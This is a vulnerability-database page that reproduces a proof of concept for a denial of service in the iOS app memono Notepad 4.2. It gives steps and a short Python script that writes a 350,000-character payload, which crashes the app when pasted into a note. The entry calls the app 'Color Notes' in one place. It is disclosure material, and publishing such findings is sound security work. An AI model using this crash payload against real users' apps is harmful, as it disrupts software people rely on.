Vulners
Lucene search
memono Notepad Version 4.2 - Denial of Service (PoC)
# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
# Version: 4.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4